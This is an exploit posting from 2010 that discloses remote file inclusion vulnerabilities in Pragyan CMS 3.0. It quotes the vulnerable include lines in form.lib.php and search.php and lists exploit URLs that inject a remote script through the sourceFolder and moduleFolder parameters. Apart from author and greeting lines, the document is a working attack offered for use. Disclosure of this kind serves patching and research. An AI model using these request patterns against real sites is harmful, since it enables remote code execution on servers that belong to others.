In The Name Of GOD ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + Pragyan CMS 3.0 Remote File Inclusion Vulnerability + + + + Discovered by Cru3l.b0y + + + + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [+] Exploit Title: Pragyan CMS 3.0 Remote File Inclusion Vulnerability [+] Date: 2010-10-21 [+] Author : Cru3l.b0y [+] Software Link: http://switch.dl.sourceforge.net/project/pragyan/pragyan/3.0/pragyanv3.0-alpha.tar.bz2 [+] Version: 3.0 [+] Tested on: Ubuntu 10.10 [+] Contact : Cru3l.b0y@gmail.com [+] Website : WwW.PenTesters.IR [+] Greeting: Behzad, Ahmad, Arash, Kose Ameye Baghie [+] register_globals = On +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [+] Vul Code [1]: "/cms/modules/form.lib.php" 37 global $sourceFolder; 38 global $moduleFolder; 39 require_once("$sourceFolder/$moduleFolder/form/editform.php"); 40 require_once("$sourceFolder/$moduleFolder/form/editformelement.php"); 41 require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php"); 42 require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php"); 43 require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php"); [+] Exploit [1]: http://target/path/cms/modules/form.lib.php?sourceFolder=script +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [+] Vul Code [2]: "/cms/modules/search/search.php" 31 $searchModuleFolder = "$sourceFolder/$moduleFolder/search"; 32 $include_dir = "$searchModuleFolder/include"; 33 include ("$include_dir/commonfuncs.php"); [+] Exploit [2]: http://target/path/cms/modules/search/search.php?moduleFolder=script http://target//path/cms/modules/search/search.php?sourceFolder=script